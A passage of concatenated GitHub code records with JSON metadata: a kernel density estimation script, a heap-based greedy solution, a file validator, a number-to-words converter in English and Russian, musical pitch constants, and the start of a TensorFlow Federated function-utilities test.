Kernels')\n\n#----------------------------------------------------------------------\n# Plot a 1D density example\nN = 100\nnp.random.seed(1)\nX = np.concatenate((np.random.normal(0, 1, 30),\n np.random.normal(5, 1, 70)))[:, np.newaxis]\n\nX = np.array(dis)\nN = len(dis)\n\nX = dis3\nmaxValue3 = np.max(dis3)\nminValue3 = np.min(dis3)\n\n# 创建等差数列 -5 到 10, 1000个数\nX_plot = np.linspace(minValue3-1, maxValue3+1, N)[:, np.newaxis]\n\n\n# 真实密度\ntrue_dens = (0.3 * norm(0, 1).pdf(X_plot[:, 0])\n + 0.7 * norm(5, 1).pdf(X_plot[:, 0]))\n\nfig, ax = plt.subplots()\nax.fill(X_plot[:, 0], true_dens, fc='black', alpha=0.2, label='input distribution')\n\n\n\n# 这里需要计算出一个合理的bandwidth\n# bandwidth约等于 1/N^(0.2) * stdValue\nbandwidth = 1/pow(N,0.2) * stdValue\n\nprint(\"bandwidth\")\nprint(bandwidth,N)\n# for kernel in ['gaussian', 'tophat', 'epanechnikov']:\nfor kernel in ['gaussian']:\n\n kde = KernelDensity(kernel=kernel, bandwidth=bandwidth).fit(X) # bandwidth=0.008\n log_dens = kde.score_samples(X_plot)\n exp_dens = np.exp(log_dens)\n ax.plot(X_plot[:, 0], np.exp(log_dens), '-',\n label=\"kernel = '{0}'\".format(kernel))\n\nax.text(6, 0.38, \"N={0} points\".format(N))\n\nax.legend(loc='upper left')\n\nax.plot(X[:, 0], -0.005 - 0.01 * np.random.random(X.shape[0]), '+k')\n\nax.set_xlim(minValue3, maxValue3)\nax.set_ylim(-0.02, 10)\n\nplt.show()\n\ndensity = np.exp(kde.score([[0.5]]))\n# 个性化访问概率\n# p = 1/N * 求和(kde.score)\n# 密度xbandwidth 计算出概率,这里有一定疑问\nprobability = density*bandwidth\nprint(probability)\n","repo_name":"DaLiWangCC/query_obfuscation","sub_path":"userQuery/kernelTest/calDistance.py","file_name":"calDistance.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585483091","text":"# 2022/11/30 Baek 15903\nimport heapq\n\nn, m = map(int, input().split())\ncards = list(map(int, input().split()))\nq = []\nfor card in cards:\n heapq.heappush(q, card)\n\nfor i in range(m):\n first = heapq.heappop(q)\n second = heapq.heappop(q)\n value = first + second\n for j in range(2):\n heapq.heappush(q, value)\n\nprint(sum(q))","repo_name":"kkw2758/Algorithm","sub_path":"Greedy/baek_15903.py","file_name":"baek_15903.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35718493360","text":"from equation import equation\nfrom re import search\n\n\ndef main(file_name):\n text = validator(file_name)\n\n if text:\n a, b, c = map(float, text.split())\n\n if a != 0:\n equation(a, b, c)\n else:\n print(\"a can't equal 0\")\n main(file_name)\n\n\ndef validator(file_name):\n pattern = r'^(-?\\d+(\\.\\d+)?\\s){2}-?\\d+(\\.\\d+)?\\n$'\n \n try:\n with open(file_name, 'r') as file:\n line = file.read()\n except FileNotFoundError:\n print(f'File {file_name} does not exist')\n return None\n\n matching = search(pattern, line)\n if matching:\n return matching.group()[:-1]\n else:\n print('Invalid file format')\n return None\n","repo_name":"lekoaa/mtrpz-lab1","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32475614964","text":"MSG_INFO = 'To convert an integer to uppercase enter it: '\nMSG_MODE = 'To select the language to transform the number into, enter en or ru: '\nMSG_ERROR = \"no integer was entered. You should enter an integer.\"\n\n\nclass NumberInWords:\n \"\"\"\n The main task of this class is to convert an integer to uppercase.\n \"\"\"\n numbers_en = {\n -1: 'minus',\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 14: 'fourteen',\n 15: 'fifteen',\n 16: 'sixteen',\n 17: 'seventeen',\n 18: 'eighteen',\n 19: 'nineteen',\n 20: 'twenty',\n 30: 'thirty',\n 40: 'forty',\n 50: 'fifty',\n 60: 'sixty',\n 70: 'seventy',\n 80: 'eighty',\n 90: 'ninety',\n 100: 'hundred'\n }\n triads_en = ['', 'thousand', 'million', 'billion', 'trillion',\n 'quadrillion', 'quintillion', 'sextillion']\n numbers_ru = {\n -1: 'минус',\n 0: 'ноль',\n 1: ('один', 'одна'),\n 2: ('два', 'две'),\n 3: 'три',\n 4: 'четыре',\n 5: 'пять',\n 6: 'шесть',\n 7: 'семь',\n 8: 'восем',\n 9: 'девять',\n 10: 'десять',\n 11: 'одинадцать',\n 12: 'двенадцать',\n 13: 'тринадцать',\n 14: 'четырнадцать',\n 15: 'пятнадцать',\n 16: 'шестнадцать',\n 17: 'семнадцать',\n 18: 'восемнадцать',\n 19: 'девятнадцать',\n 20: 'двадцать',\n 30: 'тридцать',\n 40: 'сорок',\n 50: 'пятьдесят',\n 60: 'шестьдесят',\n 70: 'семьдесят',\n 80: 'восемьдесят',\n 90: 'девяносто',\n 100: 'сто',\n 200: 'двести',\n 300: 'триста',\n 400: 'четыреста',\n 500: 'пятьсот',\n 600: 'шестьсот',\n 700: 'семьсот',\n 800: 'восемьсот',\n 900: 'девятьсот',\n }\n triads_ru = ['', ('тысяча', 'тысячи', 'тысяч'), ('миллион', 'миллиона', 'миллионов'),\n ('биллион', 'биллиона', 'биллионов'), ('триллион', 'триллиона', 'триллионов'),\n ('квадрилион', 'квадрилиона', 'квадрилионов'), ('квантилион', 'квантилиона', 'квантилионов'),\n ('секстилион', 'секстилиона', 'секстилионов')]\n\n def __init__(self, number=0, mode='ru'):\n self.mode = mode\n self.number = number\n if self.mode == 'en':\n self.numbers, self.triads = self.numbers_en, self.triads_en\n else:\n self.numbers, self.triads = self.numbers_ru, self.triads_ru\n\n # get hundreds in words\n def generate_hundred_in_words(self, rank_value):\n hundreds_value = rank_value // 100\n if hundreds_value == 0:\n return ''\n if self.mode == 'en':\n hundreds = self.numbers[hundreds_value], self.numbers[100]\n return ' '.join(hundreds)\n if self.mode == 'ru':\n return self.numbers[hundreds_value * 100]\n\n # get list of ranks\n def get_ranks(self):\n value = abs(self.number)\n ranks = []\n while value / 1000 > 1:\n rank_value = value % 1000\n ranks.append(rank_value)\n value = value // 1000\n ranks.append(value)\n ranks.reverse()\n return ranks\n\n # get tens and units in words\n def generate_units_in_words(self, rank_value):\n units = rank_value % 100\n if units != 0:\n if units < 21:\n if self.mode == 'ru' and (units == 1 or units == 2):\n return self.numbers[units][0]\n else:\n return self.numbers[units]\n else:\n words = [self.numbers[units // 10 * 10]]\n units = units % 10\n if units != 0:\n if self.mode == 'ru' and (units == 1 or units == 2):\n words.append(self.numbers[units][0])\n else:\n words.append(self.numbers[units])\n return ' '.join(words)\n return ''\n\n # modified str method to convert an integer to uppercase\n def __repr__(self):\n if self.number == 0:\n return self.numbers[0]\n number_in_words = []\n if self.number < 0:\n number_in_words.append(self.numbers[-1])\n ranks = self.get_ranks()\n number_of_ranks = len(ranks)\n for item in range(number_of_ranks):\n hundreds = self.generate_hundred_in_words(ranks[item])\n if hundreds != '':\n number_in_words.append(hundreds)\n units = self.generate_units_in_words(ranks[item])\n if units != '':\n number_in_words.append(units)\n triad = self.generate_triad_in_words(number_of_ranks, item, ranks)\n if triad != '':\n number_in_words.append(triad)\n numeric_line = ' '.join(number_in_words)\n return numeric_line\n\n # get rank in words\n def generate_triad_in_words(self, number_of_ranks, item, ranks):\n triad = self.triads[number_of_ranks - 1 - item]\n if ranks[item] == 0:\n return ''\n if triad != '':\n if self.mode == 'en':\n return triad\n else:\n triad_word = ranks[item] % 10\n if triad_word == 0 or triad_word > 4:\n triad_word = 2\n elif triad_word != 1:\n triad_word = 1\n return triad[triad_word]\n return ''\n\n\ndef main():\n try:\n number = int(input(MSG_INFO))\n mode = str(input(MSG_MODE))\n if mode in ['en', 'ru']:\n print(NumberInWords(number, mode))\n else:\n print(NumberInWords(number))\n except ValueError:\n print(MSG_ERROR)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"evroandrew/python_tasks","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4493005788","text":"from cmat.basic import natural,sharp,flat,Pitch\nfrom cmat.quality import double\n\nC0 = Pitch(1,0,None)\nCn0 = Pitch(1,0,natural)\nCs0 = Pitch(1,0,sharp)\nCx0 = Pitch(1,0,double/sharp)\nCb0 = Pitch(1,0,flat)\nCbb0 = Pitch(1,0,double/flat)\n\nD0 = Pitch(2,0,None)\nDn0 = Pitch(2,0,natural)\nDs0 = Pitch(2,0,sharp)\nDx0 = Pitch(2,0,double/sharp)\nDb0 = Pitch(2,0,flat)\nDbb0 = Pitch(2,0,double/flat)\n\nE0 = Pitch(3,0,None)\nEn0 = Pitch(3,0,natural)\nEs0 = Pitch(3,0,sharp)\nEx0 = Pitch(3,0,double/sharp)\nEb0 = Pitch(3,0,flat)\nEbb0 = Pitch(3,0,double/flat)\n\nF0 = Pitch(4,0,None)\nFn0 = Pitch(4,0,natural)\nFs0 = Pitch(4,0,sharp)\nFx0 = Pitch(4,0,double/sharp)\nFb0 = Pitch(4,0,flat)\nFbb0 = Pitch(4,0,double/flat)\n\nG0 = Pitch(5,0,None)\nGn0 = Pitch(5,0,natural)\nGs0 = Pitch(5,0,sharp)\nGx0 = Pitch(5,0,double/sharp)\nGb0 = Pitch(5,0,flat)\nGbb0 = Pitch(5,0,double/flat)\n\nA0 = Pitch(6,0,None)\nAn0 = Pitch(6,0,natural)\nAs0 = Pitch(6,0,sharp)\nAx0 = Pitch(6,0,double/sharp)\nAb0 = Pitch(6,0,flat)\nAbb0 = Pitch(6,0,double/flat)\n\nB0 = Pitch(7,0,None)\nBn0 = Pitch(7,0,natural)\nBs0 = Pitch(7,0,sharp)\nBx0 = Pitch(7,0,double/sharp)\nBb0 = Pitch(7,0,flat)\nBbb0 = Pitch(7,0,double/flat)\n\nC1 = Pitch(1,1,None)\nCn1 = Pitch(1,1,natural)\nCs1 = Pitch(1,1,sharp)\nCx1 = Pitch(1,1,double/sharp)\nCb1 = Pitch(1,1,flat)\nCbb1 = Pitch(1,1,double/flat)\n\nD1 = Pitch(2,1,None)\nDn1 = Pitch(2,1,natural)\nDs1 = Pitch(2,1,sharp)\nDx1 = Pitch(2,1,double/sharp)\nDb1 = Pitch(2,1,flat)\nDbb1 = Pitch(2,1,double/flat)\n\nE1 = Pitch(3,1,None)\nEn1 = Pitch(3,1,natural)\nEs1 = Pitch(3,1,sharp)\nEx1 = Pitch(3,1,double/sharp)\nEb1 = Pitch(3,1,flat)\nEbb1 = Pitch(3,1,double/flat)\n\nF1 = Pitch(4,1,None)\nFn1 = Pitch(4,1,natural)\nFs1 = Pitch(4,1,sharp)\nFx1 = Pitch(4,1,double/sharp)\nFb1 = Pitch(4,1,flat)\nFbb1 = Pitch(4,1,double/flat)\n\nG1 = Pitch(5,1,None)\nGn1 = Pitch(5,1,natural)\nGs1 = Pitch(5,1,sharp)\nGx1 = Pitch(5,1,double/sharp)\nGb1 = Pitch(5,1,flat)\nGbb1 = Pitch(5,1,double/flat)\n\nA1 = Pitch(6,1,None)\nAn1 = Pitch(6,1,natural)\nAs1 = Pitch(6,1,sharp)\nAx1 = Pitch(6,1,double/sharp)\nAb1 = Pitch(6,1,flat)\nAbb1 = Pitch(6,1,double/flat)\n\nB1 = Pitch(7,1,None)\nBn1 = Pitch(7,1,natural)\nBs1 = Pitch(7,1,sharp)\nBx1 = Pitch(7,1,double/sharp)\nBb1 = Pitch(7,1,flat)\nBbb1 = Pitch(7,1,double/flat)\n\nC2 = Pitch(1,2,None)\nCn2 = Pitch(1,2,natural)\nCs2 = Pitch(1,2,sharp)\nCx2 = Pitch(1,2,double/sharp)\nCb2 = Pitch(1,2,flat)\nCbb2 = Pitch(1,2,double/flat)\n\nD2 = Pitch(2,2,None)\nDn2 = Pitch(2,2,natural)\nDs2 = Pitch(2,2,sharp)\nDx2 = Pitch(2,2,double/sharp)\nDb2 = Pitch(2,2,flat)\nDbb2 = Pitch(2,2,double/flat)\n\nE2 = Pitch(3,2,None)\nEn2 = Pitch(3,2,natural)\nEs2 = Pitch(3,2,sharp)\nEx2 = Pitch(3,2,double/sharp)\nEb2 = Pitch(3,2,flat)\nEbb2 = Pitch(3,2,double/flat)\n\nF2 = Pitch(4,2,None)\nFn2 = Pitch(4,2,natural)\nFs2 = Pitch(4,2,sharp)\nFx2 = Pitch(4,2,double/sharp)\nFb2 = Pitch(4,2,flat)\nFbb2 = Pitch(4,2,double/flat)\n\nG2 = Pitch(5,2,None)\nGn2 = Pitch(5,2,natural)\nGs2 = Pitch(5,2,sharp)\nGx2 = Pitch(5,2,double/sharp)\nGb2 = Pitch(5,2,flat)\nGbb2 = Pitch(5,2,double/flat)\n\nA2 = Pitch(6,2,None)\nAn2 = Pitch(6,2,natural)\nAs2 = Pitch(6,2,sharp)\nAx2 = Pitch(6,2,double/sharp)\nAb2 = Pitch(6,2,flat)\nAbb2 = Pitch(6,2,double/flat)\n\nB2 = Pitch(7,2,None)\nBn2 = Pitch(7,2,natural)\nBs2 = Pitch(7,2,sharp)\nBx2 = Pitch(7,2,double/sharp)\nBb2 = Pitch(7,2,flat)\nBbb2 = Pitch(7,2,double/flat)\n\nC3 = Pitch(1,3,None)\nCn3 = Pitch(1,3,natural)\nCs3 = Pitch(1,3,sharp)\nCx3 = Pitch(1,3,double/sharp)\nCb3 = Pitch(1,3,flat)\nCbb3 = Pitch(1,3,double/flat)\n\nD3 = Pitch(2,3,None)\nDn3 = Pitch(2,3,natural)\nDs3 = Pitch(2,3,sharp)\nDx3 = Pitch(2,3,double/sharp)\nDb3 = Pitch(2,3,flat)\nDbb3 = Pitch(2,3,double/flat)\n\nE3 = Pitch(3,3,None)\nEn3 = Pitch(3,3,natural)\nEs3 = Pitch(3,3,sharp)\nEx3 = Pitch(3,3,double/sharp)\nEb3 = Pitch(3,3,flat)\nEbb3 = Pitch(3,3,double/flat)\n\nF3 = Pitch(4,3,None)\nFn3 = Pitch(4,3,natural)\nFs3 = Pitch(4,3,sharp)\nFx3 = Pitch(4,3,double/sharp)\nFb3 = Pitch(4,3,flat)\nFbb3 = Pitch(4,3,double/flat)\n\nG3 = Pitch(5,3,None)\nGn3 = Pitch(5,3,natural)\nGs3 = Pitch(5,3,sharp)\nGx3 = Pitch(5,3,double/sharp)\nGb3 = Pitch(5,3,flat)\nGbb3 = Pitch(5,3,double/flat)\n\nA3 = Pitch(6,3,None)\nAn3 = Pitch(6,3,natural)\nAs3 = Pitch(6,3,sharp)\nAx3 = Pitch(6,3,double/sharp)\nAb3 = Pitch(6,3,flat)\nAbb3 = Pitch(6,3,double/flat)\n\nB3 = Pitch(7,3,None)\nBn3 = Pitch(7,3,natural)\nBs3 = Pitch(7,3,sharp)\nBx3 = Pitch(7,3,double/sharp)\nBb3 = Pitch(7,3,flat)\nBbb3 = Pitch(7,3,double/flat)\n\nC4 = Pitch(1,4,None)\nCn4 = Pitch(1,4,natural)\nCs4 = Pitch(1,4,sharp)\nCx4 = Pitch(1,4,double/sharp)\nCb4 = Pitch(1,4,flat)\nCbb4 = Pitch(1,4,double/flat)\n\nD4 = Pitch(2,4,None)\nDn4 = Pitch(2,4,natural)\nDs4 = Pitch(2,4,sharp)\nDx4 = Pitch(2,4,double/sharp)\nDb4 = Pitch(2,4,flat)\nDbb4 = Pitch(2,4,double/flat)\n\nE4 = Pitch(3,4,None)\nEn4 = Pitch(3,4,natural)\nEs4 = Pitch(3,4,sharp)\nEx4 = Pitch(3,4,double/sharp)\nEb4 = Pitch(3,4,flat)\nEbb4 = Pitch(3,4,double/flat)\n\nF4 = Pitch(4,4,None)\nFn4 = Pitch(4,4,natural)\nFs4 = Pitch(4,4,sharp)\nFx4 = Pitch(4,4,double/sharp)\nFb4 = Pitch(4,4,flat)\nFbb4 = Pitch(4,4,double/flat)\n\nG4 = Pitch(5,4,None)\nGn4 = Pitch(5,4,natural)\nGs4 = Pitch(5,4,sharp)\nGx4 = Pitch(5,4,double/sharp)\nGb4 = Pitch(5,4,flat)\nGbb4 = Pitch(5,4,double/flat)\n\nA4 = Pitch(6,4,None)\nAn4 = Pitch(6,4,natural)\nAs4 = Pitch(6,4,sharp)\nAx4 = Pitch(6,4,double/sharp)\nAb4 = Pitch(6,4,flat)\nAbb4 = Pitch(6,4,double/flat)\n\nB4 = Pitch(7,4,None)\nBn4 = Pitch(7,4,natural)\nBs4 = Pitch(7,4,sharp)\nBx4 = Pitch(7,4,double/sharp)\nBb4 = Pitch(7,4,flat)\nBbb4 = Pitch(7,4,double/flat)\n\nC5 = Pitch(1,5,None)\nCn5 = Pitch(1,5,natural)\nCs5 = Pitch(1,5,sharp)\nCx5 = Pitch(1,5,double/sharp)\nCb5 = Pitch(1,5,flat)\nCbb5 = Pitch(1,5,double/flat)\n\nD5 = Pitch(2,5,None)\nDn5 = Pitch(2,5,natural)\nDs5 = Pitch(2,5,sharp)\nDx5 = Pitch(2,5,double/sharp)\nDb5 = Pitch(2,5,flat)\nDbb5 = Pitch(2,5,double/flat)\n\nE5 = Pitch(3,5,None)\nEn5 = Pitch(3,5,natural)\nEs5 = Pitch(3,5,sharp)\nEx5 = Pitch(3,5,double/sharp)\nEb5 = Pitch(3,5,flat)\nEbb5 = Pitch(3,5,double/flat)\n\nF5 = Pitch(4,5,None)\nFn5 = Pitch(4,5,natural)\nFs5 = Pitch(4,5,sharp)\nFx5 = Pitch(4,5,double/sharp)\nFb5 = Pitch(4,5,flat)\nFbb5 = Pitch(4,5,double/flat)\n\nG5 = Pitch(5,5,None)\nGn5 = Pitch(5,5,natural)\nGs5 = Pitch(5,5,sharp)\nGx5 = Pitch(5,5,double/sharp)\nGb5 = Pitch(5,5,flat)\nGbb5 = Pitch(5,5,double/flat)\n\nA5 = Pitch(6,5,None)\nAn5 = Pitch(6,5,natural)\nAs5 = Pitch(6,5,sharp)\nAx5 = Pitch(6,5,double/sharp)\nAb5 = Pitch(6,5,flat)\nAbb5 = Pitch(6,5,double/flat)\n\nB5 = Pitch(7,5,None)\nBn5 = Pitch(7,5,natural)\nBs5 = Pitch(7,5,sharp)\nBx5 = Pitch(7,5,double/sharp)\nBb5 = Pitch(7,5,flat)\nBbb5 = Pitch(7,5,double/flat)\n\nC6 = Pitch(1,6,None)\nCn6 = Pitch(1,6,natural)\nCs6 = Pitch(1,6,sharp)\nCx6 = Pitch(1,6,double/sharp)\nCb6 = Pitch(1,6,flat)\nCbb6 = Pitch(1,6,double/flat)\n\nD6 = Pitch(2,6,None)\nDn6 = Pitch(2,6,natural)\nDs6 = Pitch(2,6,sharp)\nDx6 = Pitch(2,6,double/sharp)\nDb6 = Pitch(2,6,flat)\nDbb6 = Pitch(2,6,double/flat)\n\nE6 = Pitch(3,6,None)\nEn6 = Pitch(3,6,natural)\nEs6 = Pitch(3,6,sharp)\nEx6 = Pitch(3,6,double/sharp)\nEb6 = Pitch(3,6,flat)\nEbb6 = Pitch(3,6,double/flat)\n\nF6 = Pitch(4,6,None)\nFn6 = Pitch(4,6,natural)\nFs6 = Pitch(4,6,sharp)\nFx6 = Pitch(4,6,double/sharp)\nFb6 = Pitch(4,6,flat)\nFbb6 = Pitch(4,6,double/flat)\n\nG6 = Pitch(5,6,None)\nGn6 = Pitch(5,6,natural)\nGs6 = Pitch(5,6,sharp)\nGx6 = Pitch(5,6,double/sharp)\nGb6 = Pitch(5,6,flat)\nGbb6 = Pitch(5,6,double/flat)\n\nA6 = Pitch(6,6,None)\nAn6 = Pitch(6,6,natural)\nAs6 = Pitch(6,6,sharp)\nAx6 = Pitch(6,6,double/sharp)\nAb6 = Pitch(6,6,flat)\nAbb6 = Pitch(6,6,double/flat)\n\nB6 = Pitch(7,6,None)\nBn6 = Pitch(7,6,natural)\nBs6 = Pitch(7,6,sharp)\nBx6 = Pitch(7,6,double/sharp)\nBb6 = Pitch(7,6,flat)\nBbb6 = Pitch(7,6,double/flat)\n\nC7 = Pitch(1,7,None)\nCn7 = Pitch(1,7,natural)\nCs7 = Pitch(1,7,sharp)\nCx7 = Pitch(1,7,double/sharp)\nCb7 = Pitch(1,7,flat)\nCbb7 = Pitch(1,7,double/flat)\n\nD7 = Pitch(2,7,None)\nDn7 = Pitch(2,7,natural)\nDs7 = Pitch(2,7,sharp)\nDx7 = Pitch(2,7,double/sharp)\nDb7 = Pitch(2,7,flat)\nDbb7 = Pitch(2,7,double/flat)\n\nE7 = Pitch(3,7,None)\nEn7 = Pitch(3,7,natural)\nEs7 = Pitch(3,7,sharp)\nEx7 = Pitch(3,7,double/sharp)\nEb7 = Pitch(3,7,flat)\nEbb7 = Pitch(3,7,double/flat)\n\nF7 = Pitch(4,7,None)\nFn7 = Pitch(4,7,natural)\nFs7 = Pitch(4,7,sharp)\nFx7 = Pitch(4,7,double/sharp)\nFb7 = Pitch(4,7,flat)\nFbb7 = Pitch(4,7,double/flat)\n\nG7 = Pitch(5,7,None)\nGn7 = Pitch(5,7,natural)\nGs7 = Pitch(5,7,sharp)\nGx7 = Pitch(5,7,double/sharp)\nGb7 = Pitch(5,7,flat)\nGbb7 = Pitch(5,7,double/flat)\n\nA7 = Pitch(6,7,None)\nAn7 = Pitch(6,7,natural)\nAs7 = Pitch(6,7,sharp)\nAx7 = Pitch(6,7,double/sharp)\nAb7 = Pitch(6,7,flat)\nAbb7 = Pitch(6,7,double/flat)\n\nB7 = Pitch(7,7,None)\nBn7 = Pitch(7,7,natural)\nBs7 = Pitch(7,7,sharp)\nBx7 = Pitch(7,7,double/sharp)\nBb7 = Pitch(7,7,flat)\nBbb7 = Pitch(7,7,double/flat)\n\nC8 = Pitch(1,8,None)\nCn8 = Pitch(1,8,natural)\nCs8 = Pitch(1,8,sharp)\nCx8 = Pitch(1,8,double/sharp)\nCb8 = Pitch(1,8,flat)\nCbb8 = Pitch(1,8,double/flat)\n\nD8 = Pitch(2,8,None)\nDn8 = Pitch(2,8,natural)\nDs8 = Pitch(2,8,sharp)\nDx8 = Pitch(2,8,double/sharp)\nDb8 = Pitch(2,8,flat)\nDbb8 = Pitch(2,8,double/flat)\n\nE8 = Pitch(3,8,None)\nEn8 = Pitch(3,8,natural)\nEs8 = Pitch(3,8,sharp)\nEx8 = Pitch(3,8,double/sharp)\nEb8 = Pitch(3,8,flat)\nEbb8 = Pitch(3,8,double/flat)\n\nF8 = Pitch(4,8,None)\nFn8 = Pitch(4,8,natural)\nFs8 = Pitch(4,8,sharp)\nFx8 = Pitch(4,8,double/sharp)\nFb8 = Pitch(4,8,flat)\nFbb8 = Pitch(4,8,double/flat)\n\nG8 = Pitch(5,8,None)\nGn8 = Pitch(5,8,natural)\nGs8 = Pitch(5,8,sharp)\nGx8 = Pitch(5,8,double/sharp)\nGb8 = Pitch(5,8,flat)\nGbb8 = Pitch(5,8,double/flat)\n\nA8 = Pitch(6,8,None)\nAn8 = Pitch(6,8,natural)\nAs8 = Pitch(6,8,sharp)\nAx8 = Pitch(6,8,double/sharp)\nAb8 = Pitch(6,8,flat)\nAbb8 = Pitch(6,8,double/flat)\n\nB8 = Pitch(7,8,None)\nBn8 = Pitch(7,8,natural)\nBs8 = Pitch(7,8,sharp)\nBx8 = Pitch(7,8,double/sharp)\nBb8 = Pitch(7,8,flat)\nBbb8 = Pitch(7,8,double/flat)\n\nC9 = Pitch(1,9,None)\nCn9 = Pitch(1,9,natural)\nCs9 = Pitch(1,9,sharp)\nCx9 = Pitch(1,9,double/sharp)\nCb9 = Pitch(1,9,flat)\nCbb9 = Pitch(1,9,double/flat)\n\nD9 = Pitch(2,9,None)\nDn9 = Pitch(2,9,natural)\nDs9 = Pitch(2,9,sharp)\nDx9 = Pitch(2,9,double/sharp)\nDb9 = Pitch(2,9,flat)\nDbb9 = Pitch(2,9,double/flat)\n\nE9 = Pitch(3,9,None)\nEn9 = Pitch(3,9,natural)\nEs9 = Pitch(3,9,sharp)\nEx9 = Pitch(3,9,double/sharp)\nEb9 = Pitch(3,9,flat)\nEbb9 = Pitch(3,9,double/flat)\n\nF9 = Pitch(4,9,None)\nFn9 = Pitch(4,9,natural)\nFs9 = Pitch(4,9,sharp)\nFx9 = Pitch(4,9,double/sharp)\nFb9 = Pitch(4,9,flat)\nFbb9 = Pitch(4,9,double/flat)\n\nG9 = Pitch(5,9,None)\nGn9 = Pitch(5,9,natural)\nGs9 = Pitch(5,9,sharp)\nGx9 = Pitch(5,9,double/sharp)\nGb9 = Pitch(5,9,flat)\nGbb9 = Pitch(5,9,double/flat)\n\nA9 = Pitch(6,9,None)\nAn9 = Pitch(6,9,natural)\nAs9 = Pitch(6,9,sharp)\nAx9 = Pitch(6,9,double/sharp)\nAb9 = Pitch(6,9,flat)\nAbb9 = Pitch(6,9,double/flat)\n\nB9 = Pitch(7,9,None)\nBn9 = Pitch(7,9,natural)\nBs9 = Pitch(7,9,sharp)\nBx9 = Pitch(7,9,double/sharp)\nBb9 = Pitch(7,9,flat)\nBbb9 = Pitch(7,9,double/flat)\n\n","repo_name":"Jianschang/cmat","sub_path":"pitch.py","file_name":"pitch.py","file_ext":"py","file_size_in_byte":11143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2432979497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport inspect\nimport itertools\n\nfrom absl.testing import parameterized\nimport six\nimport tensorflow as tf\n\nfrom tensorflow.python.framework import function\nfrom tensorflow_federated.python.common_libs import anonymous_tuple\nfrom tensorflow_federated.python.common_libs import test\nfrom tensorflow_federated.python.core.api import computation_types\nfrom tensorflow_federated.python.core.impl import context_base\nfrom tensorflow_federated.python.core.impl import context_stack_impl\nfrom tensorflow_federated.python.core.impl import function_utils\nfrom tensorflow_federated.python.core.impl import type_utils\n\n\nclass NoopIngestContextForTest(context_base.Context):\n\n def ingest(self, val, type_spec):\n type_utils.check_type(val, type_spec)\n return val\n\n def invoke(self, comp, arg):\n raise NotImplementedError\n\n\nclass FuncUtilsTest(test.TestCase, parameterized.TestCase):\n\n def test_is_defun(self):\n self.assertTrue(function_utils.is_defun(function.Defun()(lambda x: None)))\n self.assertTrue(\n function_utils.is_defun(function.Defun(tf.int32)(lambda x: None)))\n self.assertFalse(function_utils.is_defun(function.Defun))\n self.assertFalse(function_utils.is_defun(lambda x: None))\n self.assertFalse(function_utils.is_defun(None))\n\n def test_get_defun_argspec_with_typed_non_eager_defun(self):\n # In a non-eager defun with a defined input signature, **kwargs or default\n # values are not allowed, but *args are, and the input signature may\n # overlap with *args.\n self.assertEqual(\n function_utils.get_argspec(\n function.Defun(tf.int32, tf.bool, tf.float32,\n tf.float32)(lambda x, y, *z: None)),\n inspect.ArgSpec(\n args=['x', 'y'], varargs='z', keywords=None, defaults=None))\n\n def test_get_defun_argspec_with_untyped_non_eager_defun(self):\n # In a non-eager defun with no input signature, the same restrictions as in\n # a typed defun apply.\n self.assertEqual(\n function_utils.get_argspec(function.Defun()(lambda x, y, *z: None)),\n inspect.ArgSpec(\n args=['x', 'y'], varargs='z', keywords=None, defaults=None))\n\n # pyformat: disable\n @parameterized.parameters(\n itertools.product(\n # Values of 'fn' to test.\n [lambda: None,\n lambda a: None,\n lambda a, b: None,\n lambda *a: None,\n lambda **a: None,\n lambda *a, **b: None,\n lambda a, *b: None,\n lambda a, **b: None,\n lambda a, b, **c: None,\n lambda a, b=10: None,\n lambda a, b=10, c=20: None,\n lambda a, b=10, *c: None,\n lambda a, b=10, **c: None,\n lambda a, b=10, *c, **d: None,\n lambda a, b, c=10, *d: None,\n lambda a=10, b=20, c=30, **d: None],\n # Values of 'args' to test.\n [[], [1], [1, 2], [1, 2, 3], [1, 2, 3, 4]],\n # Values of 'kwargs' to test.\n [{}, {'b': 100}, {'name': 'foo'}, {'b': 100, 'name': 'foo'}]))\n # pyformat: enable\n def test_get_callargs_for_argspec(self, fn, args, kwargs):\n argspec = inspect.getargspec(fn) # pylint: disable=deprecated-method\n expected_error = None\n try:\n expected_callargs = inspect.getcallargs(fn, *args, **kwargs) # pylint: disable=deprecated-method\n except TypeError as e:\n expected_error = e\n expected_callargs = None\n try:\n if expected_error is None:\n result_callargs = function_utils.get_callargs_for_argspec(\n argspec, *args, **kwargs)\n self.assertEqual(result_callargs, expected_callargs)\n else:\n with self.assertRaises(TypeError):\n result_callargs = function_utils.get_callargs_for_argspec(\n argspec, *args, **kwargs)\n except (TypeError, AssertionError) as test_err:\n raise AssertionError(\n 'With argspec {}, args {}, kwargs {}, expected callargs {} and '\n 'error {}, tested function returned {} and the test has failed '\n 'with message: {}'.format(\n str(argspec), str(args), str(kwargs), str(expected_callargs),\n str(expected_error), str(result_callargs), str(test_err)))\n\n # pyformat: disable\n # pylint: disable=g-complex-comprehension\n @parameterized.parameters(\n (inspect.getargspec(params[0]),) + params[1:] # pylint: disable=deprecated-method\n for params in [\n (lambda a: None, [tf.int32], {}, True),\n (lambda a=True: None, [tf.int32], {}, False),\n (lambda a, b=True: None, [tf.int32, tf.bool], {}, True),\n (lambda a, b=True: None, [tf.int32], {'b': tf.bool}, True),\n (lambda a, b=True: None, [tf.bool], {'b': tf.bool}, True),\n (lambda a=10, b=True: None, [tf.int32], {'b': tf.bool}, True),\n (lambda a=10, b=True: None, [tf.bool], {'b': 